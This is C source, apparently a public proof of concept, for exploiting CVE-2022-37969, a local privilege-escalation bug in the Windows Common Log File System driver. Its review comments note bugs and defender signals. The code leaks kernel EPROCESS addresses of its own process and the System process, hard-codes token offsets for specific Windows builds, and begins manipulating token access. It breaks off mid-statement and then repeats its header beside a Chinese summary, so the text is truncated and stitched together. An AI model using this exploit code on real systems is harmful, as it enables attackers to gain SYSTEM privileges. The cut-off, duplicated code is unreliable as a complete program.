//
// Understanding the CVE-2022-37969 Windows Common Log File System Driver Local Privilege Escalation.
// Authors: Rainbow www.chwm.vip
//
#pragma warning (disable : 4005)
#include <stdio.h>
#include <iostream>
#include <windows.h>
#include <clfsw32.h>
#include <ntstatus.h>
#include <processthreadsapi.h>
#include <tlhelp32.h>
#include "ntos.h"
#include "crc32.h"
#pragma comment(lib, "ntdll.lib")
#pragma comment(lib, "Clfsw32.lib")
/*
Windows Server 2016 Standard ------>
Windows Server 2019 Standard ------> 17763 token offset: 0x4b8
Windows Server 2022 Standard ------> 20348 token offset: 0x4b8
Windows 10 Pro Version 21H1 -------> 19041 19043 offset: 0x4b8
Windows 10 Pro Version 21H2 -------> 19041 offset: 0x4b8
Windows 11 Pro Version 21H2 -------> 22000 token offset: 0x4b8
*/
//
// NT syscalls
//
// SYSTEM_INFORMATION_CLASS values passed to NtQuerySystemInformation.
// 0xb = SystemModuleInformation (loaded driver list), 0x10 = SystemHandleInformation.
// Both are redefined here rather than taken from a header (warning 4005 is disabled above).
#define SystemModuleInformation 0xb
#define SystemHandleInformation 0x10
// One record of the SystemBigPoolInformation result set. The low bit of the
// allocation address overlays a NonPaged flag via the first union, so the
// address must be masked before use; Tag is the 4-byte pool tag ("Clfs" etc.).
typedef struct _SYSTEM_BIGPOOL_ENTRY {
union {
PVOID VirtualAddress;
ULONG_PTR NonPaged : 1;
};
SIZE_T SizeInBytes;
union {
UCHAR Tag[4];
ULONG TagUlong;
};
} SYSTEM_BIGPOOL_ENTRY, * PSYSTEM_BIGPOOL_ENTRY;
// Header of the SystemBigPoolInformation buffer: Count entries follow inline
// (AllocatedInfo[1] is the classic "trailing array" idiom, not a fixed size).
typedef struct _SYSTEM_BIGPOOL_INFORMATION {
ULONG Count;
SYSTEM_BIGPOOL_ENTRY AllocatedInfo[1];
} SYSTEM_BIGPOOL_INFORMATION, * PSYSTEM_BIGPOOL_INFORMATION;
// Function-pointer types for the two native calls resolved at runtime.
// Note the calling-convention spellings differ (WINAPI vs NTAPI); both are
// __stdcall on x86 and ignored on x64, so this is harmless but inconsistent.
typedef NTSTATUS(WINAPI* _NtQuerySystemInformation)(SYSTEM_INFORMATION_CLASS, PVOID, ULONG, PULONG);
typedef NTSTATUS(NTAPI* _NtWriteVirtualMemory)(HANDLE, PVOID, PVOID, SIZE_T, PSIZE_T);
// Filled in by InitEnvironment(); fnNtWriteVirtualMemory is never assigned in the visible portion of the file.
_NtQuerySystemInformation fnNtQuerySystemInformation = NULL;
_NtWriteVirtualMemory fnNtWriteVirtualMemory = NULL;
//
// Leaked addresses
//
// Kernel addresses recovered at runtime. g_EProcessAddress and system_EPROCESS
// (below) are written by InitEnvironment(); the others are not assigned in the
// part of the file shown here. g_TokenAddress has no initializer but is
// file-scope, so it is zero-initialized anyway.
DWORD64 g_EProcessAddress = 0;
DWORD64 g_EThreadAddress = 0;
DWORD64 g_TokenAddress, my_pidEprocess = 0;
//
// Version dependent offsets
//
// Hard-coded kernel structure offsets. Which build(s) they were taken from is
// not recorded here (the header table above only covers the token offset), and
// none of them is referenced in the visible portion of the file.
#define OFFSET_OF_PREVIOUS_MODE 0x232
#define OFFSET_OF_WIN32PROCESS 0x3b0
#define OFFSET_OF_SEP_TOKEN_PRIVILEGES 0x40
#define OFFSET_OF_DCOMPOSITIONPROCESS 0x100
//
// CInteractionTrackerMarshaler object offsets
//
#define OFFSET_OF_FUNCTION 0x50
#define OBJECT_SIZE 0x1a0
// Signature of NtFsControlFile, used through the _NtFsControlFile pointer below.
typedef NTSTATUS func(HANDLE, HANDLE, PIO_APC_ROUTINE, PVOID, PIO_STATUS_BLOCK, ULONG, PVOID, ULONG, PVOID, ULONG);
// Global Variables
// Many of the names below (v14, v22, v30, ...) are decompiler-style and their
// meaning cannot be determined from this part of the file; comments are only
// added where the code shown establishes the purpose.
IO_STATUS_BLOCK v30;
IO_STATUS_BLOCK v31;
UINT64 offset_SeSetAccess = 0;
func* _NtFsControlFile; // resolved elsewhere; NULL until then
UINT64 fnSeSetAccessStateGenericMapping = 0;
UINT64 offset_ClfsEarlier = 0;
UINT64 fnClfsEarlierLsn = 0;
// NT-native path of the CLFS driver image (used for kernel-base lookups elsewhere).
CHAR clfs_path[] = { "\\SystemRoot\\System32\\drivers\\CLFS.SYS" };
FARPROC v22b = NULL;
// Integers initialized with NULL: compiles, but 0 is the appropriate literal.
UINT64 ntos_kernelBase = NULL;
UINT64 clfs_kernelBase = NULL;
WCHAR* stored_env_xfname = { 0 };
UINT64 v14 = 0;
UINT64 v15 = 0;
WCHAR* stored_env_containerfname = { 0 };
WCHAR* stored_env_containerfname2 = { 0 };
WCHAR* stored_env_containerfname3 = { 0 };
DWORD* hReadPipe[2] = { 0 }; // declared as DWORD* pair, not HANDLE[2]
UINT64 System_token_value = 0;
int numread;
// Size of the scratch buffer; NUMELEM and the array bound are spelled separately
// and must be kept in sync by hand.
#define NUMELEM 0x7a00
char buff[0x7a00]; // NOTE: shadowed by a local `buff` inside getOSversion()
INT64 v22 = 0;
INT64 v23 = 0;
INT64 v26 = 0;
INT64 v24 = 0;
INT64 v31b = 0;
INT64 v32 = 0;
UINT num_of_CLFS = 0;
PUINT p_num_of_CLFS = &num_of_CLFS; // number of CLFS tags
CHAR tag[] = { "Clfs" }; // pool tag to match against SYSTEM_BIGPOOL_ENTRY.Tag
PUINT64 v10 = 0; // Offset of last field virtual address
int v9 = 0; // stores the amount of bigpool clfs tags
WCHAR* stored_env_fname;
DWORD _pid = 0;
DWORD pid_to_find = 0;
int token_offset = 0; // set by getOSversion(); stays 0 on an unsupported build
LONGLONG token_value = 0;
int winversion = 0; // build number read from the registry by getOSversion()
WCHAR* stored_env_open;
WCHAR* foldr = nullptr;
DWORDLONG system_EPROCESS = 0; // set by InitEnvironment()
PUINT64 kernelAddrArray = 0;
// Process/thread/token handles. hProcess is reused for several different
// objects across the file (see checkAccessToken, which overwrites it with a
// token handle), so its meaning depends on which function ran last.
HANDLE hProcess = NULL;
HANDLE hThread = NULL;
HANDLE hToken = NULL;
HMODULE user32 = NULL;
int flag = 0;
int flag2 = 0;
UINT64 dest2 = 0;
UINT64 dest3 = 0;
UINT64 value2 = 0;
UINT64* value3 = 0;
UINT64 next_token;
// Reads the OS build number from the registry and records the token offset the
// file claims for that build.
//
// Side effects: writes the globals `winversion` and `token_offset`, opens and
// closes an HKLM key, prints progress to stdout, and calls exit(1) if the key
// cannot be opened.
// Returns: always 0. A caller cannot distinguish a supported build from an
// unsupported one by the return value; it has to inspect `token_offset`.
int getOSversion() {
char buff[100]; // shadows the file-scope `char buff[0x7a00]`
HKEY hKey;
DWORD cType; // value type reported by RegQueryValueExW; never compared with REG_SZ
wchar_t lpData[1024] = { 0 };
DWORD buffersize = sizeof(lpData); // byte count, as RegQueryValueEx expects
int tokenOffset = 0; // unused: the result is stored in the global `token_offset`
memset(buff, 0, sizeof(buff)); // clear buffer
if (RegOpenKeyEx(HKEY_LOCAL_MACHINE, TEXT("SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion"), NULL, KEY_READ, &hKey) == ERROR_SUCCESS)
{
printf("[+] Registry key Opened successfully\n");
}
else {
// NOTE(review): `%s` is given a DWORD (GetLastError()), a format/argument
// mismatch that is undefined behaviour and will typically fault on this
// error path; `%lu` is the matching specifier.
printf("[!] Failed to open reg key: %s\n", GetLastError());
exit(1);
}
// Return value is not checked: on failure lpData stays empty, atoi("") below
// yields 0, and execution falls into the "not supported" branch.
RegQueryValueExW(hKey, TEXT(L"CurrentBuild"), NULL, &cType, (LPBYTE)lpData, &buffersize);
RegCloseKey(hKey);
// convert unicode to ansi
// NOTE(review): the output bound 0x80 (128) is larger than sizeof(buff) (100);
// a build string longer than 99 bytes would overflow the local buffer. The
// bound should be sizeof(buff).
WideCharToMultiByte(CP_UTF8, 0, lpData, -1, (LPSTR)buff, 0x80, 0, 0);
// convert string to int
winversion = atoi(buff);
wprintf(L"[+] Windows Build Number: %i\n", winversion);
// check if versions are supported
if (winversion >= 17763 && winversion <= 22000) {
token_offset = 0x4b8; // store the token offset
}
else {
// Prints a message only: unlike the registry failure above this branch does
// not exit, so the function still returns 0 with token_offset left at 0.
printf("[!] Version %d not supported. Exiting...\n", winversion);
}
return 0;
}
// Resolves the kernel-mode address of the object behind a handle by walking the
// system-wide handle list returned by
// NtQuerySystemInformation(SystemExtendedHandleInformation) and matching on
// (owning PID, handle value).
//
// Object: a handle value. The value 4 is special-cased as "handle 4 owned by
//   PID 4" (the System process) instead of a handle of this process. Only the
//   low 16 bits are compared for that test, so any handle whose low 16 bits are
//   4 (e.g. 0x10004) takes the PID-4 path as well.
// Returns: the Object pointer of the matching entry. Because the outer loop
//   only exits on a match, the function never returns 0 in practice — if the
//   handle is not present, or the query keeps failing with a status other
//   than STATUS_INFO_LENGTH_MISMATCH, it spins forever, reallocating each pass.
// Requires: fnNtQuerySystemInformation already resolved (InitEnvironment).
//   PSYSTEM_HANDLE_INFORMATION_EX and SystemExtendedHandleInformation are
//   expected to come from the project header "ntos.h", which is not shown here.
// Defender note: this is a kernel-address disclosure primitive that KASLR
//   relies on denying; recent Windows builds are reported to restrict these
//   information classes for non-administrative callers, and their use from a
//   low-privilege process is a reasonable telemetry signal.
SIZE_T GetObjectKernelAddress(HANDLE Object)
{
PSYSTEM_HANDLE_INFORMATION_EX handleInfo = NULL;
ULONG handleInfoSize = 0x1000; // first guess; grown from retLength below
ULONG retLength;
NTSTATUS status;
SIZE_T kernelAddress = 0;
BOOL bFind = FALSE;
while (TRUE)
{
// NOTE(review): LocalAlloc results are never checked; a NULL return would be
// dereferenced at handleInfo->NumberOfHandles below.
handleInfo = (PSYSTEM_HANDLE_INFORMATION_EX)LocalAlloc(LPTR, handleInfoSize);
status = fnNtQuerySystemInformation(SystemExtendedHandleInformation, handleInfo, handleInfoSize, &retLength);
// 0xC0000004 is STATUS_INFO_LENGTH_MISMATCH (also available from <ntstatus.h>,
// which is included). Either way the buffer is re-sized from retLength and
// the query is issued a second time.
if (status == 0xC0000004 || NT_SUCCESS(status)) // STATUS_INFO_LENGTH_MISMATCH
{
LocalFree(handleInfo);
// 0x100 bytes of slack for handles created between the two calls; if the
// table grew by more than that the second call fails and the outer loop
// retries with the larger handleInfoSize.
handleInfoSize = retLength + 0x100;
handleInfo = (PSYSTEM_HANDLE_INFORMATION_EX)LocalAlloc(LPTR, handleInfoSize);
status = fnNtQuerySystemInformation(SystemExtendedHandleInformation, handleInfo, handleInfoSize, &retLength);
if (NT_SUCCESS(status))
{
for (ULONG i = 0; i < handleInfo->NumberOfHandles; i++)
{
if ((USHORT)Object == 0x4)
{
// System process: match PID 4 rather than our own PID.
if (0x4 == (DWORD)handleInfo->Handles[i].UniqueProcessId && (SIZE_T)Object == (SIZE_T)handleInfo->Handles[i].HandleValue)
{
kernelAddress = (SIZE_T)handleInfo->Handles[i].Object;
bFind = TRUE;
break;
}
}
else
{
// Ordinary case: a handle in the calling process's own table.
if (GetCurrentProcessId() == (DWORD)handleInfo->Handles[i].UniqueProcessId && (SIZE_T)Object == (SIZE_T)handleInfo->Handles[i].HandleValue)
{
kernelAddress = (SIZE_T)handleInfo->Handles[i].Object;
bFind = TRUE;
break;
}
}
}
}
}
// The mismatch branch already freed and reassigned handleInfo, so this is a
// single free of the current buffer; the NULL guard is redundant (LocalFree(NULL) is a no-op).
if (handleInfo)
LocalFree(handleInfo);
if (bFind)
break;
}
return kernelAddress;
}
// One-time setup: resolves NtQuerySystemInformation and records the kernel
// EPROCESS addresses of this process and of the System process (PID 4) in the
// globals g_EProcessAddress and system_EPROCESS.
//
// Side effects: overwrites the global `hProcess` with a duplicated handle to
// the current process (never closed here) and prints both addresses.
// NOTE(review): neither the GetProcAddress nor the DuplicateHandle result is
// checked; a NULL fnNtQuerySystemInformation faults inside
// GetObjectKernelAddress on the first call.
VOID InitEnvironment()
{
//
// Resolve NT syscalls
//
// ntdll is always mapped, so GetModuleHandle would do; LoadLibrary additionally bumps its reference count.
fnNtQuerySystemInformation = (_NtQuerySystemInformation)GetProcAddress(LoadLibrary("ntdll.dll"), "NtQuerySystemInformation");
// GetCurrentProcess() is a pseudo-handle that does not appear in the handle
// table, so presumably the duplicate is made to obtain a real handle value
// that GetObjectKernelAddress can look up — confirm against ntos.h usage.
DuplicateHandle(GetCurrentProcess(), GetCurrentProcess(), GetCurrentProcess(), &hProcess, 0, FALSE, DUPLICATE_SAME_ACCESS);
// printf("[+] HPROCESS %p\n", hProcess);
g_EProcessAddress = GetObjectKernelAddress(hProcess);
// `%p` with a DWORD64 argument only lines up on 64-bit builds (pointer and argument are both 8 bytes there).
printf("[+] MY EPROCESSS %p\n", g_EProcessAddress);
// (HANDLE)4 triggers the PID-4 special case in GetObjectKernelAddress.
system_EPROCESS = GetObjectKernelAddress((HANDLE)4);
printf("[+] SYSTEM EPROCESSS %p\n", system_EPROCESS);
return;
}
int checkAccessToken() {
int v8 = 0; // todavia no se que es
PHANDLE TokenHandle = 0; //
int savedHprocess = 0;
NTSTATUS status2;
ULONG size2;
NTSTATUS status3;
UINT64 v11 = 0;
PUINT v12 = 0;
user32 = LoadLibraryW(L"user32.dll");
int currentpid = GetCurrentProcessId();
hProcess = OpenProcess(PROCESS_QUERY_INFORMATION, 0, currentpid);
if (!hProcess) {
printf("[!] OpenProcess failed with error %d\n", GetLastError());
}
printf("[+] hProcess: 0x%x\n", hProcess);
savedHprocess = (UINT)hProcess;
if (!OpenProcessToken(hProcess, TOKEN_ADJUST_PRIVILEGES, &hProcess)) {
printf("[!] OpenProcessToken failed with error %d\n", GetLastError());
return 0;
}
TokenHandle = &hProcess;
printf("[+] Token handle: 0x%x\n", TokenHandle);
VOID* v10 = malloc(0x20);
if (!v10) { exit(1); }
status2 = fnNtQuerySystemInformation((SYSTEM_INFORMATION_CLASS)SystemHandl
CVE-2022-37969 是通用日志文件系统驱动 clfs 中的越界写入漏洞,通过该漏洞,可以完成提权。 // // Understanding the CVE-2022-37969 Windows Common Log File System Driver Local Privilege Escalation. // Authors: www.chwm.vip // #pragma warning (disable : 4005) #include <stdio.h> #include <iostream> #include <windows.h> #include <clfsw32.h> #include <ntstatus.h> #include <processthreadsapi.h> #include <tlhelp32.h> #include "ntos.h" #include "crc32.h" #pragma comment(lib, "ntdll.lib") #pragma comment(lib, "Clfsw32.lib")